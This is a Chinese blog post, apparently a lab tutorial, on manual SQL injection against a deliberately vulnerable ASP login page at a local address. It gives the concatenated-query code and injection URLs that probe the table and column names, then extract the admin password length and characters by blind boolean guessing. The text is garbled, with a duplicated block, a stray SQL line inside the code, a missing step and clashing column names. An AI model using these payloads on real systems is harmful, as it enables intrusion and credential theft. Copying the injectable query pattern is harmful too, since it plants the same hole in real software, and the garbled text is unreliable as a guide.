SQL手工注入测试
login.html
<html> <head><title>請登錄</title></head> <body><div align="center"><form action="login.asp" method="post">請輸入密碼:<br><br>用 戶:<input name="name" type="textbox"><br>密 碼:<input name="pass" type="password"><br><input value="登錄" type="submit"></form></div> </body> </html>
login.asp
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>登錄</title> </head> <body> <% inname=Request("name") inpass=Request("pass")set conn=server.createobject("ADODB.CONNECTION") conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db") sqlstr="SELECT * FROM data Where uname='" & inname & "'"select * from data where name = 'admin' and 1=1 and 'a'='a' Set rs=conn.Execute(sqlstr)if inpass=rs("pass") then response.write("<h3>登錄成功!</h3>")response.write("用戶編號:" & rs("uid") & "<br>") elseresponse.write("登錄失敗!") end ifSet rs=Nothing conn.close %> </body> </html>
參數: http://192.168.10.1/login.asp?pass=test&name=test
原SQL語句:SELECT * FROM data Where uname='test'
1.構造能執行的SQL語句
http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相當于執行SQL語句為SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果執行成功,1=1就是我們可能執行的SQL語句
2.猜表名
將1=1替換 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相當于執行SQL語句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0
<html> <head><title>請登錄</title></head> <body><div align="center"><form action="login.asp" method="post">請輸入密碼:<br><br>用 戶:<input name="name" type="textbox"><br>密 碼:<input name="pass" type="password"><br><input value="登錄" type="submit"></form></div> </body> </html>
login.asp
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>登錄</title> </head> <body> <% inname=Request("name") inpass=Request("pass")set conn=server.createobject("ADODB.CONNECTION") conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db") sqlstr="SELECT * FROM data Where uname='" & inname & "'"select * from data where name = 'admin' and 1=1 and 'a'='a' Set rs=conn.Execute(sqlstr)if inpass=rs("pass") then response.write("<h3>登錄成功!</h3>")response.write("用戶編號:" & rs("uid") & "<br>") elseresponse.write("登錄失敗!") end ifSet rs=Nothing conn.close %> </body> </html>
參數: http://192.168.10.1/login.asp?pass=test&name=test
原SQL語句:SELECT * FROM data Where uname='test'
1.構造能執行的SQL語句
http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相當于執行SQL語句為SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果執行成功,1=1就是我們可能執行的SQL語句
2.猜表名
將1=1替換 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相當于執行SQL語句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'
3.猜用戶名字段
(select count(name) from data)>0
4.猜密碼字段
(select count(pass) from data)>0
//判斷密碼長度大于1
(Select count(*) from data where name='admin' and len(pass)>1)>0 ?
//判斷密碼長度大于10
6.逐位猜密碼
//猜測第1位密碼是否為數字(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0
//猜測第1位密碼是否為字母
(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0//猜測第1位密碼是否等于c
(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0
總結
- 上一篇: cp命令复制目录 不覆盖
- 下一篇: mysql5.7.17版本介绍_mysq